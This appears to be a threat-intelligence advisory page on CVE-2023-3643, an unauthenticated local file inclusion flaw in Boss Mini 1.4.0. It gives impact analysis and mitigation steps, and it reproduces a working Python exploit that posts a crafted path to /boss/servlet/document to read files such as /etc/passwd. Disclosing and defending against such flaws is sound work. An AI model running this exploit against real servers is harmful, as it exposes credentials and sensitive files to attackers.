Boss Mini v1.4.0 - Local File Inclusion (LFI)
Boss Mini version 1. 4. 0 suffers from a Local File Inclusion (LFI) vulnerability (CVE-2023-3643) that allows an attacker to read arbitrary files on the server by manipulating the 'path' parameter in a POST request to the /boss/servlet/document endpoint. Exploit code written in Python demonstrates how to send a crafted request to retrieve sensitive files such as /etc/passwd. The vulnerability does not require authentication and can be exploited remotely via HTTP requests. Successful exploitation can lead to disclosure of sensitive information, potentially aiding further attacks. No patches or mitigations are currently linked, and no known active exploitation in the wild has been reported. The exploit is medium severity due to its impact and ease of exploitation but limited to information disclosure without direct code execution. Organizations using Boss Mini 1. 4.
AI Analysis
Technical Summary
The Boss Mini application version 1.4.0 contains a Local File Inclusion (LFI) vulnerability identified as CVE-2023-3643. This vulnerability exists in the handling of the 'path' parameter submitted via POST requests to the /boss/servlet/document endpoint. An attacker can manipulate this parameter to include and read arbitrary files from the server's filesystem. The provided exploit code, written in Python, uses the 'requests' library to send a crafted POST request with a URL-encoded file path, such as '/etc/passwd', to the vulnerable endpoint. The server responds with the contents of the requested file if the request is successful (HTTP 200). The exploit requires no authentication or user interaction, making it remotely exploitable. The vulnerability allows attackers to access sensitive configuration files, credentials, or other data that could facilitate further attacks such as privilege escalation or lateral movement. No official patches or fixes are referenced, and no active exploitation has been reported yet. The vulnerability is categorized as medium severity due to its potential impact on confidentiality and ease of exploitation but lacks direct code execution or system compromise capabilities on its own.
Potential Impact
The primary impact of this LFI vulnerability is unauthorized disclosure of sensitive files on affected servers running Boss Mini 1.4.0. Attackers can read configuration files, password files, application source code, or other sensitive data, which may contain credentials or secrets. This information leakage can enable further attacks such as privilege escalation, remote code execution via chained exploits, or lateral movement within a network. Organizations relying on Boss Mini for business-critical operations risk exposure of intellectual property, user data, and internal system details. The vulnerability's ease of exploitation without authentication increases the risk of automated scanning and mass exploitation attempts. Although no active exploitation is currently known, the availability of public exploit code lowers the barrier for attackers. The impact is significant for organizations with internet-facing Boss Mini deployments or insufficient network segmentation and monitoring.
Mitigation Recommendations
1. Immediately restrict access to the /boss/servlet/document endpoint using network controls such as firewalls or web application firewalls (WAF) to limit exposure to trusted IPs only. 2. Implement input validation and sanitization on the 'path' parameter to prevent directory traversal and file inclusion attacks. 3. If possible, upgrade Boss Mini to a version where this vulnerability is patched; if no patch exists, contact the vendor for guidance or apply custom fixes. 4. Employ runtime application self-protection (RASP) or host-based intrusion detection systems (HIDS) to detect and block suspicious file inclusion attempts. 5. Monitor logs for unusual requests targeting the vulnerable endpoint or attempts to access sensitive files. 6. Conduct a thorough audit of exposed files and credentials to identify any compromised data. 7. Segment and isolate the application server to minimize lateral movement in case of compromise. 8. Disable unnecessary file read permissions for the application process to limit accessible files. 9. Educate security teams about this vulnerability and ensure incident response plans include LFI attack scenarios.
Affected Countries
United States, Germany, India, Brazil, United Kingdom, France, Japan, Australia, Canada, Netherlands
Indicators of Compromise
- exploit-code: # Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI) # Date: 07/12/2023 # Exploit Author: nltt0 # Version: 1.4.0 (Build 6221) # CVE: CVE-2023-3643 from requests import post from urllib.parse import quote from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 [https://github.com/nltt-br] """ print(banner) try: parser = ArgumentParser(description='Local file inclusion [Boss Mini]') parser.add_argument('--domain', required=True, help='Application domain') parser.add_argument('--file', required=True, help='Local file') args = parser.parse_args() host = args.domain file = args.file url = '{}/boss/servlet/document'.format(host) file2 = quote(file, safe='') headers = { 'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange', 'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host) } data = { 'path': file2 } try: req = post(url, headers=headers, data=data, verify=False) if req.status_code == 200: print(req.text) except Exception as e: print('Error in {}'.format(e)) except Exception as e: print('Error in {}'.format(e))
Boss Mini v1.4.0 - Local File Inclusion (LFI)
Description
Boss Mini version 1. 4. 0 suffers from a Local File Inclusion (LFI) vulnerability (CVE-2023-3643) that allows an attacker to read arbitrary files on the server by manipulating the 'path' parameter in a POST request to the /boss/servlet/document endpoint. Exploit code written in Python demonstrates how to send a crafted request to retrieve sensitive files such as /etc/passwd. The vulnerability does not require authentication and can be exploited remotely via HTTP requests. Successful exploitation can lead to disclosure of sensitive information, potentially aiding further attacks. No patches or mitigations are currently linked, and no known active exploitation in the wild has been reported. The exploit is medium severity due to its impact and ease of exploitation but limited to information disclosure without direct code execution. Organizations using Boss Mini 1. 4.
AI-Powered Analysis
Technical Analysis
The Boss Mini application version 1.4.0 contains a Local File Inclusion (LFI) vulnerability identified as CVE-2023-3643. This vulnerability exists in the handling of the 'path' parameter submitted via POST requests to the /boss/servlet/document endpoint. An attacker can manipulate this parameter to include and read arbitrary files from the server's filesystem. The provided exploit code, written in Python, uses the 'requests' library to send a crafted POST request with a URL-encoded file path, such as '/etc/passwd', to the vulnerable endpoint. The server responds with the contents of the requested file if the request is successful (HTTP 200). The exploit requires no authentication or user interaction, making it remotely exploitable. The vulnerability allows attackers to access sensitive configuration files, credentials, or other data that could facilitate further attacks such as privilege escalation or lateral movement. No official patches or fixes are referenced, and no active exploitation has been reported yet. The vulnerability is categorized as medium severity due to its potential impact on confidentiality and ease of exploitation but lacks direct code execution or system compromise capabilities on its own.
Potential Impact
The primary impact of this LFI vulnerability is unauthorized disclosure of sensitive files on affected servers running Boss Mini 1.4.0. Attackers can read configuration files, password files, application source code, or other sensitive data, which may contain credentials or secrets. This information leakage can enable further attacks such as privilege escalation, remote code execution via chained exploits, or lateral movement within a network. Organizations relying on Boss Mini for business-critical operations risk exposure of intellectual property, user data, and internal system details. The vulnerability's ease of exploitation without authentication increases the risk of automated scanning and mass exploitation attempts. Although no active exploitation is currently known, the availability of public exploit code lowers the barrier for attackers. The impact is significant for organizations with internet-facing Boss Mini deployments or insufficient network segmentation and monitoring.
Mitigation Recommendations
1. Immediately restrict access to the /boss/servlet/document endpoint using network controls such as firewalls or web application firewalls (WAF) to limit exposure to trusted IPs only. 2. Implement input validation and sanitization on the 'path' parameter to prevent directory traversal and file inclusion attacks. 3. If possible, upgrade Boss Mini to a version where this vulnerability is patched; if no patch exists, contact the vendor for guidance or apply custom fixes. 4. Employ runtime application self-protection (RASP) or host-based intrusion detection systems (HIDS) to detect and block suspicious file inclusion attempts. 5. Monitor logs for unusual requests targeting the vulnerable endpoint or attempts to access sensitive files. 6. Conduct a thorough audit of exposed files and credentials to identify any compromised data. 7. Segment and isolate the application server to minimize lateral movement in case of compromise. 8. Disable unnecessary file read permissions for the application process to limit accessible files. 9. Educate security teams about this vulnerability and ensure incident response plans include LFI attack scenarios.
Technical Details
- Edb Id
- 52482
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Boss Mini v1.4.0 - Local File Inclusion (LFI)
# Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI) # Date: 07/12/2023 # Exploit Author: nltt0 # Version: 1.4.0 (Build 6221) # CVE: CVE-2023-3643 from requests import post from urllib.parse import quote from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_... (1411 more characters)
Threat ID: 69a792c9d1a09e29cbc1c319
Added to database: 3/4/2026, 2:02:49 AM
Last enriched: 3/4/2026, 2:04:00 AM
Last updated: 3/4/2026, 7:44:49 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Bruteforce Scans for CrushFTP , (Tue, Mar 3rd)
MediumWeGIA 3.5.0 - SQL Injection
MediumEasy File Sharing Web Server v7.2 - Buffer Overflow
Mediummailcow 2025-01a - Host Header Password Reset Poisoning
MediumWordPress Backup Migration 1.3.7 - Remote Command Execution
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.